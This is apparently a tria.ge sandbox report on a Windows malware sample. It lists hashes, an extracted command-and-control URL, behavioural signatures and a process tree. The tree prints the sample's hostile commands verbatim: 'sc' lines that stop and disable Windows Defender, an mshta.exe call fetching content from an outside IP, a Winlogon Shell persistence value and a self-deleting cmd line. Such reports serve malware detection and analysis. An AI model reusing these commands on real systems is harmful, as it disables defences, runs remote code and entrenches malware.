Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
30/12/2023, 13:08
Static task
static1
Behavioral task
behavioral1
Sample
197d8655ed6900478b74c479fe2a1fd9.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
197d8655ed6900478b74c479fe2a1fd9.exe
Resource
win10v2004-20231222-en
General
-
Target
197d8655ed6900478b74c479fe2a1fd9.exe
-
Size
2.2MB
-
MD5
197d8655ed6900478b74c479fe2a1fd9
-
SHA1
0225e85f1d912e719fec67d379f19a28625ceaa6
-
SHA256
73f4622c81dc1eb87d9c018bee31e0b3f61a9e3fccfa7dc6b70501d09c6fed91
-
SHA512
6479e6ed498cdf81ba8e4e726a5f2faa7cc8d7cb2489bbd2bc1db2f277fde6d1ab5a5720bafa7116a5a083c76c1ca415840dd820b83d8d93f992a3b04765781f
-
SSDEEP
49152:7sgqSiGCeSWxUs9cY+fN11ivBzV+3ZYqjuPOBW0wtuVXIPcOU7m6MICD5:7nqFveZb9LKYvT+3SiiO8Lc5OU7a5
Malware Config
Extracted
http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=AVCIKYMG&2=i-s&3=63&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\ouaisv.exe" ouaisv.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 2284 mshta.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 197d8655ed6900478b74c479fe2a1fd9.exe -
Executes dropped EXE 1 IoCs
pid Process 1908 ouaisv.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3344 sc.exe 2136 sc.exe 628 sc.exe 3848 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1908 ouaisv.exe Token: SeShutdownPrivilege 1908 ouaisv.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe 1908 ouaisv.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1908 ouaisv.exe 1908 ouaisv.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2928 wrote to memory of 628 2928 197d8655ed6900478b74c479fe2a1fd9.exe 23 PID 2928 wrote to memory of 628 2928 197d8655ed6900478b74c479fe2a1fd9.exe 23 PID 2928 wrote to memory of 628 2928 197d8655ed6900478b74c479fe2a1fd9.exe 23 PID 2928 wrote to memory of 2136 2928 197d8655ed6900478b74c479fe2a1fd9.exe 22 PID 2928 wrote to memory of 2136 2928 197d8655ed6900478b74c479fe2a1fd9.exe 22 PID 2928 wrote to memory of 2136 2928 197d8655ed6900478b74c479fe2a1fd9.exe 22 PID 2928 wrote to memory of 1908 2928 197d8655ed6900478b74c479fe2a1fd9.exe 21 PID 2928 wrote to memory of 1908 2928 197d8655ed6900478b74c479fe2a1fd9.exe 21 PID 2928 wrote to memory of 1908 2928 197d8655ed6900478b74c479fe2a1fd9.exe 21 PID 2928 wrote to memory of 1860 2928 197d8655ed6900478b74c479fe2a1fd9.exe 32 PID 2928 wrote to memory of 1860 2928 197d8655ed6900478b74c479fe2a1fd9.exe 32 PID 2928 wrote to memory of 1860 2928 197d8655ed6900478b74c479fe2a1fd9.exe 32 PID 1908 wrote to memory of 3344 1908 ouaisv.exe 30 PID 1908 wrote to memory of 3344 1908 ouaisv.exe 30 PID 1908 wrote to memory of 3344 1908 ouaisv.exe 30 PID 1908 wrote to memory of 3848 1908 ouaisv.exe 24 PID 1908 wrote to memory of 3848 1908 ouaisv.exe 24 PID 1908 wrote to memory of 3848 1908 ouaisv.exe 24 PID 1908 wrote to memory of 2284 1908 ouaisv.exe 27 PID 1908 wrote to memory of 2284 1908 ouaisv.exe 27 PID 1908 wrote to memory of 2284 1908 ouaisv.exe 27
Processes
-
C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe"C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Users\Admin\AppData\Roaming\ouaisv.exeC:\Users\Admin\AppData\Roaming\ouaisv.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3848
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=AVCIKYMG&2=i-s&3=63&4=9200&5=6&6=2&7=919041&8=1033"3⤵
- Blocklisted process makes network request
PID:2284
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:3344
-
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2136
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:628
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\197D86~1.EXE" >> NUL2⤵PID:1860
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1